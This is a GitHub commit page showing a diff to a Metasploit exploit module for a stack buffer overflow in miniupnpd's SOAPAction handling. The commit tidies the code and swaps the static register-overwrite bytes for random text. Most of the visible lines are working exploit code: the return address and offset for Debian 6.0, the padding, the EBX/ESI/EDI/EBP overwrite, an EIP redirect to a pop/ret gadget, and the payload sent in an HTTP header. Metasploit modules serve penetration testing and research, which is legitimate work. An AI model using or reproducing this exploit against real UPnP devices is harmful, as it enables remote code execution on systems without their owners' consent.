Skip to content

Commit 8ced348

Browse files
dejanvirisdejanviris
committed
Deleted some undeeded comments and used the text_rand function rather than static values.
1 parent df20e79 commit 8ced348

File tree

1 file changed

+5
-10
lines changed

1 file changed

+5
-10
lines changed

modules/exploits/multi/upnp/miniupnpd_soap_bof.rb

Lines changed: 5 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -9,6 +9,7 @@
99

1010
class Metasploit3 < Msf::Exploit::Remote
1111
include Msf::Exploit::Remote::HttpClient
12+
Rank = NormalRanking
1213

1314
def initialize(info = {})
1415
super(update_info(info,
@@ -20,7 +21,6 @@ def initialize(info = {})
2021
},
2122
'Author' => [ 'Dejan Lukan' ],
2223
'License' => MSF_LICENSE,
23-
'Version' => '$Revision: 9999 $',
2424
'DefaultOptions' => { 'EXITFUNC' => 'process', },
2525
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
2626
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
@@ -33,7 +33,6 @@ def initialize(info = {})
3333
],
3434
'Targets' =>
3535
[
36-
#['Debian GNU/Linux 4.0', { 'Ret' => 0x0804c334, 'Offset' => 2123 }],
3736
['Debian GNU/Linux 6.0', { 'Ret' => 0x0804ee43, 'Offset' => 2123 }],
3837
],
3938
'DefaultTarget' => 0,
@@ -61,14 +60,13 @@ def exploit
6160
sploit += payload.encoded
6261

6362
# nops
64-
#sploit += "\x90"*(target['Offset'] - sploit.length - 16)
6563
sploit += rand_text(target['Offset'] - sploit.length - 16)
6664

6765
# overwrite registers on stack: the values are not used, so we can overwrite them with anything
68-
sploit += "\x41\x41\x41\x41" # overwrite EBX
69-
sploit += "\x42\x42\x42\x42" # overwrite ESI
70-
sploit += "\x43\x43\x43\x43" # overwrite EDI
71-
sploit += "\x44\x44\x44\x44" # overwrite EBP
66+
sploit += rand_text(4) # overwrite EBX
67+
sploit += rand_text(4) # overwrite ESI
68+
sploit += rand_text(4) # overwrite EDI
69+
sploit += rand_text(4) # overwrite EBP
7270

7371
# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
7472
# stack points directly to the string after 'Soapaction: ', which is why we must
@@ -104,9 +102,6 @@ def exploit
104102
'uri' => target_uri.path,
105103
'headers' => {
106104
'SOAPAction' => sploit,
107-
#'User-Agent' => 'Python-urllib/2.7',
108-
#'Connection' => 'close',
109-
#'Content-Type' => 'application/x-www-form-urlencoded',
110105
},
111106
'data' => data,
112107
})

0 commit comments

Comments
 (0)